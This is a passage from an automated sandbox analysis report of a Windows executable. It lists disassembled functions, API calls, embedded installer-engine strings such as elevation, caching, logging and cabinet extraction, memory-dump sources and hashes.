                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Name$ComputerFileModule
                                                                                                                                                                                                                                                                                                  • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                                                                                                                                                  • API String ID: 2577110986-3153207428
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b6bdf33e0a38c734405f815235d697633905dea1b603beffd79c812052d3717
                                                                                                                                                                                                                                                                                                  • Instruction ID: 77aed383857efaf69984f2645f93c71ad8197f8a887617f34728e15d0a710987
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b6bdf33e0a38c734405f815235d697633905dea1b603beffd79c812052d3717
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 234197B290011C9BEB14DF64DC45EEA73BCFB59308F0041BAF649E3502D631AE848F69
                                                                                                                                                                                                                                                                                                  Function 0087D437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000001,008AB500,?,00000001,000000FF,?,?,75A4B390,00000000,00000001,00000000,?,008774E6), ref: 0087D560
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to connect to elevated child process., xrefs: 0087D549
                                                                                                                                                                                                                                                                                                  • UX aborted elevation requirement., xrefs: 0087D475
                                                                                                                                                                                                                                                                                                  • Failed to create pipe name and client token., xrefs: 0087D4A1
                                                                                                                                                                                                                                                                                                  • Failed to elevate., xrefs: 0087D542
                                                                                                                                                                                                                                                                                                  • Failed to create pipe and cache pipe., xrefs: 0087D4BD
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087D46B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                  • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2962429428-3003415917
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6cbc541ed176e51b69f261a101d0f8a549e7ef90d2c59477c903a62629ea8d77
                                                                                                                                                                                                                                                                                                  • Instruction ID: 46425f405009d241665d983fc9c085a0c3873102b8d5fcceffffc6e0c83e29ae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cbc541ed176e51b69f261a101d0f8a549e7ef90d2c59477c903a62629ea8d77
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43312B726447267BE725A668CC47FBA776CFF00734F108215F91CEA285DB61ED0086D6
                                                                                                                                                                                                                                                                                                  Function 0087D24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087AD40,?,00000000,00000000), ref: 0087D2E9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087D2F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?), ref: 0087CF37
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087CF25: GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0087D376
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 0087D34D
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087D319
                                                                                                                                                                                                                                                                                                  • Failed to create elevated cache thread., xrefs: 0087D323
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3606931770-4134175193
                                                                                                                                                                                                                                                                                                  • Opcode ID: c7a06d22da34f69a3847d5415533935322bd893521ea1987903a0cbce88a9d5c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99ef75539cf6f13b0a5df5721c9c24eaefc07d8bb426a5df0d4ed4c5723ac74c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7a06d22da34f69a3847d5415533935322bd893521ea1987903a0cbce88a9d5c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441E4B6D01219AFDB15DFA9D8859DEBBF8FF48710B10412AF918E7340E77499008FA5
                                                                                                                                                                                                                                                                                                  Function 008A159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008A15DA
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008A163C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 008A1648
                                                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008A168B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Value
                                                                                                                                                                                                                                                                                                  • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 198323757-1648651458
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a1790b56e04aeb9ce4fb16e3fd05b0979717eaed452b4d5210be8fd27bbae93
                                                                                                                                                                                                                                                                                                  • Instruction ID: d5361ab9a488b7df573c120a2eaa3ee363e51773457617f5475f474cd5eaa629
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a1790b56e04aeb9ce4fb16e3fd05b0979717eaed452b4d5210be8fd27bbae93
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75418F7290022AABEF119F988D89AAEBBB8FB55750F050165F911EB610D730DD118BA0
                                                                                                                                                                                                                                                                                                  Function 008A0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0533
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,008CB5F4,?,00874207,00000000,Setup), ref: 008A05D7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?,?,?), ref: 008A05E7
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00862F09
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008CB5FC,?,?,008CB5F4,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A067A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: 593c51931507d6c67958441a8876960c415bef6baa0b4dbb9406de457edb77e5
                                                                                                                                                                                                                                                                                                  • Instruction ID: e1fc2388b754b1cc67b3eadd8fdcb73e1a3ea4aa892fc3fb42b21274a2ee185e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 593c51931507d6c67958441a8876960c415bef6baa0b4dbb9406de457edb77e5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C531FF71D0072AEBEB219FA48D86F6A7778FB12758F010224F900E7661DB71CC209FA0
                                                                                                                                                                                                                                                                                                  Function 0088398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 008839F4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to escape string., xrefs: 00883A76
                                                                                                                                                                                                                                                                                                  • %s%="%s", xrefs: 00883A27
                                                                                                                                                                                                                                                                                                  • Failed to format property string part., xrefs: 00883A6F
                                                                                                                                                                                                                                                                                                  • Failed to format property value., xrefs: 00883A7D
                                                                                                                                                                                                                                                                                                  • Failed to append property string part., xrefs: 00883A68
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-515423128
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9b0357470f7ffbc8231af1897ea9d30982fe01e57fc1ea62469817bd86c3bf22
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70ce73151f9d679bea631a85a6f3804608b662b82009e19108889257a049324c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b0357470f7ffbc8231af1897ea9d30982fe01e57fc1ea62469817bd86c3bf22
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D31C17290422ABFDB15AE98CC42EAEBB68FF00B04F11426AF851E6350D7709F10DB90
                                                                                                                                                                                                                                                                                                  Function 008A41E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001), ref: 008A4203
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000002,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001,000007D0,00000001,00000001,00000003), ref: 008A4212
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001), ref: 008A42A6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0087A063,00000001,000007D0,00000001), ref: 008A42B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3479031965-1689471480
                                                                                                                                                                                                                                                                                                  • Opcode ID: 420231a91b8bcf19a12d12df56439907610831482fac85ca5ccb3b4636e8c4fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: f0a379f57284a7254f330765d30646186e16a6d62c70708004bf4ed1eee7e3aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 420231a91b8bcf19a12d12df56439907610831482fac85ca5ccb3b4636e8c4fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B31D136A0122A9BFF315E99CC01B6E7A69FFD3761B115029FC04DBA14D3F08C5186D0
                                                                                                                                                                                                                                                                                                  Function 0086732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00865932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0086733E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00865932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0086741D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get unformatted string., xrefs: 008673AE
                                                                                                                                                                                                                                                                                                  • *****, xrefs: 008673D9, 008673E6
                                                                                                                                                                                                                                                                                                  • Failed to format value '%ls' of variable: %ls, xrefs: 008673E7
                                                                                                                                                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 0086740C
                                                                                                                                                                                                                                                                                                  • Failed to get variable: %ls, xrefs: 0086737F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2873099529
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba748c88b2aa63fb6710c2a35068f361e7132ffc4009808afa639a77989dacf7
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2323971b6784bf74a26660a79769072c023de775a00e4889a14e2a39d892e63
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba748c88b2aa63fb6710c2a35068f361e7132ffc4009808afa639a77989dacf7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6531E03290461AFBEF226F44CC09BAEBB64FF11329F024225FD00E6750D775AA649BD5
                                                                                                                                                                                                                                                                                                  Function 00878DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00878E37
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878E41
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00878EA1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate administrator SID., xrefs: 00878E1D
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878E65
                                                                                                                                                                                                                                                                                                  • Failed to initialize ACL., xrefs: 00878E6F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 669721577-1117388985
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82685de01f9bf3ef27ff249378bb5160cc53c556149046b9b7615c0bf70a4523
                                                                                                                                                                                                                                                                                                  • Instruction ID: 78ae7e619c83ad2028ce5a5daa94b8258e4c7fc71a31a5bfefa6c29d82fb46c5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82685de01f9bf3ef27ff249378bb5160cc53c556149046b9b7615c0bf70a4523
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21D833A80614F7EB219AD99C8AF9FB769FB45B20F118025F918FB280DB74DD009691
                                                                                                                                                                                                                                                                                                  Function 00864212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12), ref: 0086424D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001), ref: 00864259
                                                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?), ref: 00864294
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00874028,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001), ref: 0086429E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 152501406-1104880720
                                                                                                                                                                                                                                                                                                  • Opcode ID: 215679d0e6f9124f3e5310458000b77ebff6c853bb5a963f418e8694150a8cf1
                                                                                                                                                                                                                                                                                                  • Instruction ID: b270db74e93395eb45485ebef06536c66c45c15ea715671728fa040a94b0424b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 215679d0e6f9124f3e5310458000b77ebff6c853bb5a963f418e8694150a8cf1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011B777E01637AB97215AD98864B5FBA58FF05B617231175FE00E7341E720DC0086E0
                                                                                                                                                                                                                                                                                                  Function 00880B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880C2B
                                                                                                                                                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 00880C35
                                                                                                                                                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 00880BC1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
